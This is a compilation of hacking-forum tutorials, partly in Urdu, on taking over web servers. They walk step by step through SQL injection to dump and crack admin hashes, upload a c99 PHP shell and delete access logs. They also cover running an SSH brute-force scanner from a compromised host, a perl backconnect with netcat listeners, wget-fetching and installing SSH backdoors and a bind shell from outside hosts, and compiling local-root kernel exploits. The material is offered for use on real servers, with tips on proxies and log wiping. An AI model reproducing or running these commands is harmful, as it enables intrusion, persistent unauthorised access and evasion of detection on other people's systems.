Advanced SQLiTutorial - Complete website r00ting [RE-EDITED by Computer Science]

Advanced SQL Injection Tutorial - Complete website Rooting by Coded32

This work has been in proud memorial to my haters, the social fake system and some of my best friends.

Note :- This is NOT my work. The credits goes to the following, I only took the opportunity to explore it, share it and I have grated the permission of the Author "Coded32", so cheers.

Credits for the Tutorial and the r00t :-

Coded32
Mantra Security
LAMP Security
C99 shell Creator.
Abhi_M
Limerick
Evil
Srchasst
BrandonMXB
DSG - Dragon Slayer Guy
N3t

Well before I go through the tutorial, let me Introduce myself. I am a complete noob at Hacking, but I do hack and had hacked some good sites and I know the basics, not much, but i can rely on my basics, so before going thorough this tutorial what you will need are the following :-

1.) A Working Brain to understand the concept.
2.) A Computer that runs Windows [Linux is better]
3.) Patience

So, before Introducing my re-edited edition of what Coded32 and the contributers had already wrote, I make it more noob friendly for the members here hat Hackforums. I am NOT the original writer of this method, and take no responsibility with what you do with this thing, but I just should say you -> Always prepare yourself behind 3 proxies before getting your hands dirty on a legal server. The precautions that you can take are, be sure to use a proxy with SSH and use PUTTY or Tor, that suits you the most. I have also added images to make things more clear for the beginners. Remember , in hacking and exploring, you always have to get your hands dirty and keep exploring, so please be patience till the end of this thread as it will be a long procedure, in any way if you get distracted by the long method, you fail. So good luck on your Fascinating journey on r00ting servers.

- Computer Science.

Note on my THREAD -> It took me a lot of time to design this thread for the convenience of the users here at Hackforums, so please kindly add a reply to the thread to keep it alive as well as make me feel that the work I did was fruitful. I would appreciate that. Thanks.

The ORIGINAL content from Advance SQLi to r00ting starts here :)

What you will need are the following :

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell" I recommend Devil shell from Team Nuts, Indian Hackers.

The Process.

I have a Website for you :)

Code:

http://192.168.132.128/

I went through all the pages of web site and found a page with URL input

Code:

http://192.168.132.128/?id=13

I launched Hackbar by pressing F9

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:

http://192.168.132.128/?id=13'

Since the page content is different from the previous one. I can make sure that the web page is vulnerable. And might be you already know how a vulnerable webpage looks?

Lets find out the number of tables

So we will be using the ORDER+BY Command.

Code:

http://192.168.132.128/?id=13 order by 1

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage.

Code:

http://192.168.132.128/?id=13 order by 7

I went up to 7 and no change till now

Code:

http://192.168.132.128/?id=13 order by 7

The ORDER+BY Injection at 8 changes the page, so I find a way to hack this webserver :P

Code:

http://192.168.132.128/?id=13 order by 8

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables.

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

---

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page, I don't have to explain these if you already know Basic SQLi tricks.

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

The current user is cms_user@localhost

Lets find out the version of the database. I replaced 2 in the URL with version() command.

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

5.0.45 is the version, so I think that will be an easy target. google more and research for version below this like for any other versions if you get or 4.0.x, Let me list all the tables

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

From this list I found "user" is an interesting table, Now I listed all the columns and its a big list

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

I want columns from the table "user" and nothing else

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

---

Lets find the user name

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

Now, what about password

Code:

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

it is encrypted, ha ha Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

Voila.!!! I got the password

Finding the log in page. Its was right in front of me, but on other cases you need to find it, i ain't go explain everything, you have to do a lot of research and that is how hackers do, and explorers and pirates explores

Logging in with the credentials I have, Greetings.!!! I'm an admin now. Look at my powers. Let me add an event.

and of course I want to upload a picture

Lets see it allows me to upload the shell or not

Now I'm pressing on "Add Event" button

Nice. Looks like it's got uploaded

Let's see where the shell got uploaded to

---

I'm trying to get the default upload location

Looks like I got it. Let me click on the c9shell.php file I just uploaded. Voila. I have shell access

I simply clicked on the up button to get the root folder

Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial.

What I'm interested is the log folder
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Let me go back and edit the log file

I deleted complete log entries. Now saving it. Nice. Log file is empty now

Now. Lets remove the c99 shell by pressing on Self Remove, Confirmed.!!!, OK. Good Bye C99

Thanks to keep Patience, keep the THREAD alive by simply giving out a reply, a reply would justify my Hard work on this THREAD :)

---

SQLi + R00ting, STEP by STEP each with Pictures, best in whole HF.

What To Do Next After Root

Well i have watched so many times someone rooted a server and mass-deface it And i was like WTF? Why dont they use it for something ealse....Till today like i promised a Tutorial what to do after you got Root on the server

So lets start What To Do Next?

-Well after geting root privileges you can do what ever you wonna with the server installing/removing/updating/adding users/browe everything.
But am not going to speak about anything above this...Am going to show you how to use the Root in the best way possible

-I dont know if anyone of you have hearded about SSH(Secure Shell Hosting) this is on port 22 its connecting on the routher and sometimes directly on the PC.This is used for hidding you ass Am using it when am doing something really stupid .Today we are going to Scan for SSH(SecureShellHosting).

What We Need:
*Root Priv. On Some Server
*Putty
*Scanner
*Patience

1st _...Putty...._

Download Link For Putty:

Code:

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

Download putty and connect to your hacked Server

2nd. ~Scanner~

After we connect to our Victims PC(Server) we need to get a scanner.
Here is one
[code]http://www.freewebs.com/gbl-net/cristina.tgz/[code]
Now to download it from there we use wGet Command

Code:

wget http://www.freewebs.com/gbl-net/cristina.tgz

When the download finish we need to extrat this scanner from his file and for that we use

Code:

tar -zxvf scanner_name.tgz

in this case:

Code:

tar -zxvf cristina.tgz

Than we need to enter the folder where are the files from the scanner :

Code:

cd Scanner_Folder_Name

This case:

Code:

cd Cristina

And we give all files 777 permisions so they can be executed easly from anyuser not only root

Code:

chmod +x *

After we done all this we can start scanning now you can use from proxys ips am going to use

Code:

189.254.237.190

but we do not enter the whole IP we only enter the first 2 numbers

Code:

189.254

And now we start scaning by executing this:

Code:

./start 189.254

Now we wait till the scaning ends After the scan ends its brute-forcing time its checking for user and password and we still gonna to wait
After The Scan and BruteForcing ends you can open the vuln.txt and see something like this:

Code:

cat vuln.txt

*Note: Non Of This Works..This is just to show you how it will looks!

Code:

test:test 68.15.219.98 
oscar:oscar 68.16.249.206
user:user 68.19.179.99 
test123:123456 66.113.138.78
user:1234 67.19.130.75 
guest:guest1 67.53.138.125
root:admin 67.53.145.51 
root:pa55word 67.55.5.81 
oracle:oracle 67.69.131.94 
oracle:oracle 67.69.131.30 
user:user 67.78.114.180 
root:abc123 67.78.170.186
tomcat5:tomcat5 67.87.115.176 
admin:sysmail 67.90.99.71 
root:beach 67.90.99.71
stud:stud 67.90.99.71 
trash:trash 67.90.99.71
aaron:aaron123 67.90.99.71 
gt05:gt05 67.90.99.71
william:william 67.90.99.71
stephanie:stephanie 67.90.99.71 
root:hamster 67.90.99.71
root:welcome1 67.90.99.71 
root:admin 67.90.36.86 
root:admin 67.90.36.85 
diane:diane 67.98.52.24
admin:sysmail 189.254.204.116 
root:beach 189.254.204.116 
stud:stud 189.254.204.116 
trash:trash 189.254.204.116

Thank You For Reading This Tutorial If You Like It Press Thanks And Feel Free To Comment!

Tutorial Writen By AlphaSky

BackConnection with linux server via BIND through NetCat (Urdu Language)

When you tried to break into any linux server's, One of the common method to connect the server via command prompt is called backconnect, In this video tutorial you will learn how you can use a bind file to connect with linux server via shell.

Rooting

Exploiting and Rooting a Webserver from

Scratch Complete Tutorial


Intro:

For todays tutorial we shall learn how to
exploit and root a webserver also gaining future access. The tutorial is most likely to be divided in three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access

Hacking a Forum Admin using Exploit to Gain,
Admin Access - Part 1:


As said earlier i'm going to exploit ipb v2.1 forum here. You can hack

other forums too using exploits or making own exploits (which is rare )

Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and

some other things.

Download:

Code:

http://depositfiles.com/files/9juskrtax

Gaining Admin Access:

For today i will be hacking an ipb 2.1 forum by gaining admin access and

then I will show you how to root the server.

First i will be using a perl exploit and gain admin access to the forum. Usually the admin id

is 1 maybe 0 or 2 sometimes.

Here it is this guy:

UserName: Kawool
UserId = 2

Next we extract the user hash and salt. Switch to cmd and execute the perl

exploit.



Then you should see this sql injection tool.

Change the forum index path, userid (of the admin), the table name.



After you click get data from database you should see this hash:



Then use converage pass salt option.




After you get the hash the next step to do is crack the salted hash. Since

it is ipb , cracking the hash will be a pain for sure.

Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.



Now probably go to sleep or drink 4-5 cup of tea until the hash is cracked.

I got mine after sometime.



So now:

Code:

Username: Kawool

Password: *******

I'm gonna login as admin now ^^; Lets move on to the main part of gaining root access.

Uploading The Shell as Admin - Part 2:

Uploading a Shell:

Now that we have the admin access in our hand now is the part when we

upload a shell (For those who don't know what a shell is, It is a php script that gives

privilages to upload files on a website, mess with other files etc. And yeah allows to gain

root access too).

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.



Now lets browse our shell shall we..



w00t we has the shell uploaded properly.Next upload a c99 shell from this shell. Why we did

this is because c99 shells can be detected somwetimes. So the other shell is like a decoy.

Once its done we upload c99 shell.



Good shell was uploaded properly.



That does it for our 2nd part. Move on to Third.

Using the Shell to Gain Root Access - Part 3:

Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So i upload back.pl i provided in the file.




After thats done time to use the script.

For this we give the following code.

Code:

perl back.pl youripaddress

BEFORE we execute the script we need to start netcat and start listening to conenctions on

port 2121.

use netcat from my downloadfile, and use the command:

Code:

nc -vv -l -p 2121

Next we shall upload an exploit that will let us obtain root status on the server



Time to execute it.



Now we upload a backdoor for future access.

Type in the following command:

Code:

wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)

Now the following command:

Code:

tar -zxvf sshdoor.tgz

Then we make sshdoor the current directory using this code:

Code:

cd sshdoor

Then:

Code:

cat README

after you see the window with sang and prabu name. Execute the command:

Code:

.install yourpassword 2121

After thats done, we connect to the server via putty.


Err an Epic Fail has occured my friends.



Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).


Now we upload xbind.c this should be over quickly. Remember the steps don't you?

Indeed its easy.



Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):

Code:

gcc -o xbind xbind.c

Compile, run and connect.

Paste the following code now:

Code:

./xbind 1985

Switch to netcat again. and run the connection code (nc vv blah blha blah) to the ip.

Now enter teh password and get going.

Code:

uname -a

There you go, we now have future access to the server

That does it for our Rooting Server tutorial. Yeah i agree, Gaining root access is a pain but its worth the reward. So now that you read this tut, please comment


Thanks If u Liked This!

How To Root Server Very Detailed

Chalo G STart Karte hein

Kuch Sawalo K Jawab

1=Rooting Kia Hota Hei ??

Rooting Asal me Main Admin Tak Ponchna Yeni Is Sit Ka Admin Name Kia hei Aur Isko Bypass Kaise karte Hein Rooting Kehty hein

Asaan Alfaaz Me User Me Access Karna "Root" Kehlata hei.....

2=Hum Ko Rooting K Leye Kia Kuch Chaye?

1:-App K Paas "Shell Upload" Hona Chaye Jo Me Aap Ko Nahe Dy Sakta...
2:-App K Pass "Exploit" Hona Chaye jo K Exploit Section Me Aap Ko Mil Sakta hei...
3:-Aap K Pass "Log Cleaner" Hona Chaye Jo K Apko Mera Dost Dy Ga ( What The Hell Who is your Friend):@ Simply Google.Com...
4:-App K pass "SSH Backdoor" Hona Chaye Ye B Mere Dost K Pass He Hei G.....
5:-App K Pass "netCat" Hona Chaye Ye B Mere Dost SE He Mile Ga Yeni www. Google .Com Se....
6:-App K Pass "Putty" Software Hona Chaye Jo K Aap Ko AAp K Dost Google.com SE mily ga.....lol
7:-Aap k Pass "Brain" Hona chaye jo K Sub Se Lazmi Cheez Hei Aur Ye Na Me Dy Sakta HOn Aur Na Google Dy Sakta Hei Ye Sirf "Quraan" Dy Sakta hei....

Sub Se Pehly Hum Servers Se Back Connection Karegy

IS K Leye

Start Par Ja Kar Run Par Ja Kar Cmd Likh Kar Enter Dabana Hei Aap Ne Yeni Command Prompt Open Karna hei Pher Jaha Apny "Netcat"
Save Kiya Hei Wo Likhna hei Pher Exmple

Ap Ne NetCat ko C:// Drive Me Save Kiya Howa hei Tu Ap ne

Code:

Cd C://

Pher

Code:

Cd netcat

Code:

Cd Netcat.Exe

Is K Baad AaP Shell Ki Taraf Ajao Aap Shell Ko Firfox Ya Kisi BRowser Me Open Karo Pher Aap Shell Me Back Connection par Click Karo
Ager Nahe Hei To Koi Shell Upload Karo Jaise "priv8.php or SyRiAn Sh3ll V7 " Ye Hein "SyRiAn Sh3ll V7 " Is The Best Shell ...
Waise Aap Ki marzi hei Jo Marzi Use Karo........

Apna Ip Adress Likho Jo K pehly He Likha Hoga Ip Bar me Pher Port Me 2121 Likhy Aur connect Par Click Kar Do Aap Is Se App Shell Ko Server Par Kar Ly gy
Pher AAp Cmd B Dy Sakty hein Server K Zarye Jis Par Shell Majood hei App Ki Choice Hei...

Ab NetCat Wali Windows Ko Open Karo Aur ye Cmd Do...

[COLOR="#00FF00"]

Code:

nc -| -v -p 2121

Ye Cmd Apko Ye OutPut Dy Gi...
c:\netcat>nc -l -v -p 2121
Listning On 2121

Note:
Aap Koi B Opened Port Use Kar Sakty Hein Waise 2121 Thek Rahe Gi Q K Ye Opened Port Hei Anyway Its Your Choice....


2:-Exploit

Humne Ab Sahi Expoit Dondna Hei Jo k Hume Is Cmd Se Pata Chaly ga

Aap Shell Par Pher Chaly jaye Pher Waha type Kare

Code:

#Uname -a

Aur Enter Ka Button Dabao Aap Ko Kuch Aisa Nazar Ayega

[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux

Aap Deekh Sakty Hein K Server Ka Version Karnal 2.6.34 Aur Year 2011 Hei "Its For Exmple"

Aap Ko Ab 2.6.34 2011 Exploit Chaye Jo K Aap Ko Ab Assani Se Mil Sakta hei
# PCA , or Google Ya Pher Kisi B HackForum Se Mil Sakta Hei
Nehe Tu Pher App Ko Offical Websits Se Mil Jaye Ga,,,,,.....
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com


Using Of Exploit

Exploit Ko Istmaal Kaise karna hei yeni Isko Execute Kaise karna hei

Hum Ne Exploit C: Drive Me Save kar Lia Hei Lekn hum Ko Shell Par Upload Karna Hei Pher isko Compile Karne Ki Zaroorat hogi Aur
Exploit Sirf Upload Karne Se Execute Nahe Hoga Hum Ko "Shell Me TMP Directory Me Jana Hoga " Q K Tmp Hamesha Writable Directory Hoti hei Is ley Hum
Ye Cmd Type kare Gy Shell Par

Code:

cd /home/websitusername/public_html/tmp

Directory Mukhtlf B Ho Sakti Hei Maslan

cd /home/websitusername/public_html/admin/tmp

cd /home/websitusername/public_html/image/tmp
Waghera Isi Tarah He Kuch Hoga

Pher Ap ne Exploit Server Par Execute Karna Hei Us K Leye

Code:

Wget http :// exploitWebsite  .com/ 2011-exploits / exploitname.c

Code:

http: //exploitwebsite. com/ 2011-exploits/ exploitname.c

Koi WebSite Nahe Hei Is Me Ap ne Website Wo Likhni Hei Jaha Exploit Hei
Jaise Aap Exploit Download Likh Sakte Ho Aap......

Ye Cmd Deny k Baad Kuch Is Tarah Ki Screeen Hogi

Code:

admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http:// exploitwebsite. com/ 2011-exploits/ exploitname.c
--2011-09-22 05:12:14-- http://exploitwebsite.com/2011-exploits/exploitname.c
Resolving exploitwebsite.com... 199.58.192.192
Connecting to exploitwebsite . com|199.58.192.192|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16003(15K) [text/x-csrc]
Saving to: `exploitname.c'

Note:
199.58.192.192 Ye Apka Ip Adress Hei

Ab Exploit Save Hogia Hei Humare Shelled Server par Ab Hum ne Exploit Ki Permission 777 Me Change Karni Hei....

Is K Leye Hum Cmd Dy Gy

Type

Code:

Chmod 777 ExploitName.c

Ab Exploit Humare Server Par Majood Hei Aur Full Control Hei Yeni Full Permission (777) Me Hei...

Abi Khush Mat Ho.....

Ab Hum Ne Exploit Ko Compile Aur Execute Karna Hei Jo Is Cmd Se Hogi.....

Type

Code:

gcc -o Exploit Exploitname.c

Ye Compile Ho Kar Exploit Save HO Jaye Ga Aik Exploit K Toor Par...

Pher Hum Ko Agla Proccess Hum Ne Exploit Ko Execute karna Hei Is Cmd Se

Type

Code:

./exploit 

Apko Server Jawab Dy Ga K Root Hogia hei

Ab Humko Chek Karna Hei K Ye Waqia he Root Howa hei Ya Nahe Tu Hum Ne Ye Cmd Deni Hei......

type

Code:

Whoami

Ye Aapko Jawab Dy ga "root"

Kuch Is Tarah Hoga

uid=xxx(root) gid=xx(root) groups=xxx(root)



Pher Ye Type Karna Hei Full Control K Leye

Type

Code:

su

Ok Done!

Chup Kar Khush Mat Ho Abi Intermition Shero Howa hei...(Joking)

3:-SSH Backdoor

Ab Hum ne BackDoors Install Karne Hei Tu Hum Ne Ye Cmd Deny Hei

Type

Code:

#Wget http:/ / www. urlofbackdoor . com/ sshdoor.zip

Pher Agy Sshdoor.zip Ko Unzip Karna hei

Hum Ye Cmd Dy Gy UnZip K Leye

Type

Code:

#Unzip Sshdoor.zip

PHer Extrect Hone K Bad Ye Cmd Deni hei
Type

Code:

Cd Sshdoor

Pher Ye Cmd Deni Hei

Code:

./run yourpass port

Yourpass Ki Jaga Aap Ne Apna Password Dena Hei Aur Port Ki Jaga Aap Ne Port Likhni Hei

Pher Aap Ne Putty Ko Open karna Hei Aur Connect Kar Dena Hei Putty K Sath ....

Ab Khush Ho Ja Jiger Jo Karna Chahta Hei Server K Sath kar Ly Ab Sever Par Tera Ful Control hei ..........lol

Bacdoor Insttaling K Leye Jo Cmd Use Hoi Hein Wo Ye hein

Code:

#Wget http : // www.urlofbackdoo r.  com/sshdoor.zip
#Unzip Sshdoor.zip
#Cd sshdoor
#./run dangeroushacker 21

Thats All


MukhTlif Language Me Exploit Ko Execute Karny K Leye Aap Ye Cmd Use Kar Sakty hei


C exploit

----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------

Perl Exploits

---------------
perl exploit.pl
---------------

Python

------------------
python exploit.py
------------------

php

-----------------
php exploit.php
-----------------

zip

----------------
unzip exploit.zip
./run
----------------

Ager Kisi Ko Pher B Samj Na I Ho Tu Please MujSe Mat Pochye ga......


Ye Tutorial Mene Bari Mehnat Se Khud Likha Hei Aur Iska Credit K4rl Team Ko B Jata Hei Ager Koi Ghalti Hoi Ho Tu Plz Maaf Kar Dijye Ga Aur Yahan Post Kar Dijeye ga....Thnx


Just for Education Purpose !!

Please Meri Hosla Afzai K Leye Comments Aur Thnx Par Zaroor Kijye Ga Ager Aap K Reply Aye Gy Tu He Me Next Tutorial Urdu me Likho Ga Warna Nahe Likho GA....

This Is My First Tutiral In Urdu For Real Hackers.......